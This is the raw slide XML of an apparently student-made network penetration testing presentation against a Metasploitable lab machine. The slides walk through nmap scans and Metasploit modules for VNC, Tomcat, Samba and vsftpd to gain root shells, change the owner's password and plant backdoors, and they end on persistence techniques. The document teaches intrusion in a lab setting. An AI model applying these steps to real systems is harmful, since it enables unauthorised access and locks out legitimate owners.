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Montserrat 1 Bold" charset="1" panose="00000800000000000000"/>
      <p:regular r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat 1" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Bold" charset="1" panose="020B0802020202020204"/>
      <p:regular r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Canva Sans" charset="1" panose="020B0503030501040103"/>
      <p:regular r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat 2 Bold" charset="1" panose="00000600000000000000"/>
      <p:regular r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat 2" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Canva Sans Bold" charset="1" panose="020B08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3.jpe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9.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image5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4.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image5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7.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image58.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image5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https://github.com/MohamedSayed47/DEPI_Final_project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79.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId12" Target="../media/image80.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId2" Target="../media/image69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4399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67500"/>
            <a:ext cx="8756885" cy="809502"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="323259" cy="29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259" cy="29883"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="29883" w="323259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5320" y="3053573"/>
            <a:ext cx="14643805" cy="361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43"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="827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NETWORK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7443"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="827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PENETRATION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7443"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="827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TESTING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="595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67951" y="6843651"/>
            <a:ext cx="967838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Target: Metasploitable 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71" y="91692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37109"/>
            <a:ext cx="291417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37B4BE"/>
                </a:solidFill>
                <a:latin typeface="Arial Bold"/>
                <a:ea typeface="Arial Bold"/>
                <a:cs typeface="Arial Bold"/>
                <a:sym typeface="Arial Bold"/>
              </a:rPr>
              <a:t>port 5900 (vnc)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3521" y="2703975"/>
            <a:ext cx="12262320" cy="99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5"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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VNC (Virtual Network Computing) is a remote desktop protocol that allows users to control a computer remotely. It typically operates on port 5900 and transmits the graphical desktop environment over the network, enabling full interaction with the remote system.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4594938"/>
            <a:ext cx="7268764" cy="2822180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2822180" w="7268764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7268764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7268764" y="2822180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2822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61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6449" y="4594938"/>
            <a:ext cx="5664015" cy="4773815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4773815" w="5664015">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5664015" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664015" y="4773816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="477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255213"/>
            <a:ext cx="573598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NMAP --SCRIPT VULN -P5900 &lt;TARGET-IP&gt;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07082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71" y="91692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51223"/>
            <a:ext cx="7380369" cy="65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PORT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8180 - APACHE TOMCAT: </a:t>
            </a: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 -SV -P8180 &lt;TARGET-IP&gt;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5789726"/>
            <a:ext cx="7171379" cy="3796046"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3796046" w="7171379">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7171379" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7171379" y="3796046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37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70" r="0" b="-226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3164735"/>
            <a:ext cx="6920244" cy="1946924"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1946924" w="6920244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6920244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6920244" y="1946923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="194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21" r="0" b="-21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164735"/>
            <a:ext cx="6347460" cy="2289887"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2289887" w="6347460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6347460" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6347460" y="2289886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2289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1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789726"/>
            <a:ext cx="6362700" cy="3314700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3314700" w="6362700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6362700" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63627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8388" y="2347912"/>
            <a:ext cx="10376299" cy="6437238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6437238" w="10376299">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10376298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10376298" y="6437238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="643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5" t="-280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151" y="700088"/>
            <a:ext cx="1094496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KEY VULNERABILITIES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="62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1419117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4151" y="3853895"/>
            <a:ext cx="5999546" cy="2975412"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="221531" cy="1098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531" cy="109866"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="109866" w="221531">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221531" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221531" y="109866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109866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1531" cy="167016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l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After gathering information about the machine, we configure our target servers.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2749" y="1501871"/>
            <a:ext cx="11305251" cy="8785129"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1751479" cy="1361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1479" cy="1361046"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1361046" w="1751479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2"/>
              <a:stretch>
                <a:fillRect l="-16635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71945" y="5026488"/>
            <a:ext cx="2393316" cy="2338553"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="88349" cy="86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89312"/>
            <a:ext cx="1472150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6357" y="6286606"/>
            <a:ext cx="2124492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Metasploit FramWork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18484" y="5376982"/>
            <a:ext cx="500239" cy="672325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672325" w="500239">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="500238" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500238" y="672324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672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154" t="-19065" r="-46211" b="-24807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847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9012" y="2847231"/>
            <a:ext cx="331633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37B4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 8180 - Apache Tomcat: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4158" y="3324524"/>
            <a:ext cx="52234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 port 8180 and detect Apache Tomcat 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39012" y="3838239"/>
            <a:ext cx="6347460" cy="2289887"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2289887" w="6347460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6347460" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6347460" y="2289886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228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13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64003" y="3132346"/>
            <a:ext cx="814205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 web interface access manually 3 Use Metasploit’s tomcat_mgr_upload module 4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64003" y="3838239"/>
            <a:ext cx="5708366" cy="3436152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3436152" w="5708366">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5708366" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5708366" y="3436152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3436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1204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847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24110"/>
            <a:ext cx="113494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 target IP, path, and credentials 5 Set payload and listener IP/port 6 Run exploit to get shell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13847" y="3166300"/>
            <a:ext cx="5786752" cy="3954399"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3954399" w="5786752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5786751" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5786751" y="3954399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="395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5975" y="3166300"/>
            <a:ext cx="5864228" cy="3329559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3329559" w="5864228">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5864229" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5864229" y="3329560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="332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05975" y="7029260"/>
            <a:ext cx="586422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Now we can open shell ,add new user, set backdoors and much much more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0342" y="95956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847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97" y="2576381"/>
            <a:ext cx="19061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37B4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1900">
                <a:solidFill>
                  <a:srgbClr val="37B4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ort 5900 (vnc):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67442"/>
            <a:ext cx="103033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 spc="-12">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat 2 Bold"/>
                <a:ea typeface="Montserrat 2 Bold"/>
                <a:cs typeface="Montserrat 2 Bold"/>
                <a:sym typeface="Montserrat 2 Bold"/>
              </a:rPr>
              <a:t>vulnerability: alllow full acees to the target screen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4188" y="3411942"/>
            <a:ext cx="4671780" cy="1255541"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1255541" w="4671780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4671780" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4671780" y="1255541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125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991458"/>
            <a:ext cx="7007871" cy="3341751"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3341751" w="7007871">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7007871" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7007871" y="3341751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="334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21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771550"/>
            <a:ext cx="8338279" cy="1446170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1446170" w="8338279">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8338279" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8338279" y="1446170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="144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827312"/>
            <a:ext cx="4479674" cy="96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1899" spc="-11">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat 2"/>
                <a:ea typeface="Montserrat 2"/>
                <a:cs typeface="Montserrat 2"/>
                <a:sym typeface="Montserrat 2"/>
              </a:rPr>
              <a:t>after using metasploit we searched for vnc_login as the first step to get the password of it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498375"/>
            <a:ext cx="833827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AS WE CAN SEE SE SET THE RHOST AS USUAL TO OUR TAGET AND SET THE USERNAME TO ROOT IN ORD</a:t>
            </a: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ER TO KNOW THE PASSWORD OF IT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1470" y="10287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241667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847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064850" y="2955034"/>
            <a:ext cx="8825810" cy="4832131"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4832131" w="8825810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8825810" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8825810" y="4832130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="483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85466" y="7989359"/>
            <a:ext cx="84011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HERE IT ASKS FOR THE PASSWORD SO WE ENTER PASSWORD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59280" y="3780505"/>
            <a:ext cx="6927223" cy="1362995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1362995" w="6927223">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6927223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6927223" y="1362995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1362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103301" y="3395241"/>
            <a:ext cx="10247301" cy="38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now we have full access to the target screen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902805" y="323268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359" y="3679907"/>
            <a:ext cx="6519656" cy="4618505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4618505" w="6519656">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6519656" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6519656" y="4618505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="461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7359" y="2817474"/>
            <a:ext cx="2388632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37B4BE"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
                <a:ea typeface="Canva Sans"/>
                <a:cs typeface="Canva Sans"/>
                <a:sym typeface="Canva Sans"/>
              </a:rPr>
              <a:t>port  5900 (vnc)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823" y="8469862"/>
            <a:ext cx="9759017" cy="45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5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now we changed the password of our target so he cant reach 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823" y="2503149"/>
            <a:ext cx="1109884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3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847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847" y="2479960"/>
            <a:ext cx="15258737" cy="49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000">
                <a:solidFill>
                  <a:srgbClr val="0D92B9"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
                <a:ea typeface="Canva Sans"/>
                <a:cs typeface="Canva Sans"/>
                <a:sym typeface="Canva Sans"/>
              </a:rPr>
              <a:t>SMB Service(Samba "username map script" Command Execution)-ports 45 , 139:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013847" y="380320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225577"/>
            <a:ext cx="1200680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used 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Metasploit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exploit the Samba "</a:t>
            </a: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username map script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 Command Execution(searching for samba/usermap_script).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3847" y="4599993"/>
            <a:ext cx="6492240" cy="4144315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4144315" w="6492240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6492240" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6492240" y="4144316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4144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95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83940" y="4599993"/>
            <a:ext cx="5690731" cy="4144315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4144315" w="5690731">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5690731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690731" y="4144316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4144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213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0871" y="4599993"/>
            <a:ext cx="4497652" cy="4144315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4144315" w="4497652">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4497651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4497651" y="4144316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4144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039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3243" y="3096170"/>
            <a:ext cx="5999546" cy="1420206"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="221531" cy="52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531" cy="52441"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="52441" w="221531">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221531" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221531" y="52441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="524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531" cy="905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1228725"/>
            <a:ext cx="1665668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  OUR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1680" y="3749123"/>
            <a:ext cx="355626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JR PENTRATAION TESTER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3243" y="3400168"/>
            <a:ext cx="5999546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Waleed Khalid Edress Abdelkader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5702105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15440" y="3096170"/>
            <a:ext cx="5919601" cy="1420206"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="218579" cy="524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579" cy="52441"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="52441" w="218579">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="218579" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218579" y="52441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="524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8579" cy="905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15440" y="5932977"/>
            <a:ext cx="5999546" cy="1420206"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="221531" cy="524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1531" cy="52441"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="52441" w="221531">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221531" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221531" y="52441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="524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1531" cy="905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03243" y="5932977"/>
            <a:ext cx="5999546" cy="1420206"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="221531" cy="524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1531" cy="52441"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="52441" w="221531">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221531" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221531" y="52441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="524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1531" cy="905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57137" y="3901523"/>
            <a:ext cx="355626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JR PENTRATAION TESTER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31680" y="6768342"/>
            <a:ext cx="355626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JR PENTRATAION TESTER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4816" y="6768342"/>
            <a:ext cx="355626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JR PENTRATAION TESTER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35495" y="3501463"/>
            <a:ext cx="5999546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Mohamed Sayed Maher Ahmed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203243" y="6234932"/>
            <a:ext cx="5999546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Abdelrahman Tarek Farouk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15440" y="6249705"/>
            <a:ext cx="6186665" cy="57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2373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Ahmed Mohamed Ahmed Elganagy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2136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-10792129">
            <a:off x="-5010436" y="8959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792129">
            <a:off x="11124147" y="8944750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84990"/>
            <a:ext cx="37745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FTP (vsftpd) port 21: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351526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445945"/>
            <a:ext cx="10100781" cy="2335035"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2335035" w="10100781">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10100781" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10100781" y="2335034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="233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87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08884" y="4445945"/>
            <a:ext cx="10100781" cy="2799743"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2799743" w="10100781">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10100781" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10100781" y="2799742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2799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451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50924" y="4445945"/>
            <a:ext cx="1486553" cy="338252"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="322795" cy="734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2795" cy="73449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="73449" w="322795">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="322795" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322795" y="73449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734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322795" cy="10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1496" y="6223979"/>
            <a:ext cx="4608793" cy="407341"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1000768" cy="88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0768" cy="88451"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="88451" w="1000768">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1000768" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000768" y="88451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88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00768" cy="117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72894" y="6722768"/>
            <a:ext cx="1970173" cy="602417"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="427810" cy="130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810" cy="130811"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="130811" w="427810">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427810" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427810" y="130811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1308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27810" cy="15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3686716"/>
            <a:ext cx="6595975" cy="39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searching for the vuln in the metasploit vsftpd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110640"/>
            <a:ext cx="5408258" cy="39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finding the vuln we will  exploit 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08884" y="7511575"/>
            <a:ext cx="5144207" cy="39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now have access to the root user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48703" y="9069721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33735" y="0"/>
            <a:ext cx="7450255" cy="10552725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="10552725" w="7450255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7450255" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7450255" y="10552725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10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65" r="0" b="-137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28725"/>
            <a:ext cx="1156832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879" y="2749981"/>
            <a:ext cx="938985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Techniques attackers use to ensure continued control over a compromised system, even after reboots, credential changes, or other defensive actions.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879" y="4648008"/>
            <a:ext cx="66093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37B4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Do Attackers Maintain Access?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894" y="5895783"/>
            <a:ext cx="4096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Prolonged Exploitation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894" y="6860932"/>
            <a:ext cx="25086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Survivability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894" y="7826132"/>
            <a:ext cx="52581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Facilitating Lateral Movement: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906" y="8159434"/>
            <a:ext cx="681038" cy="681038"/>
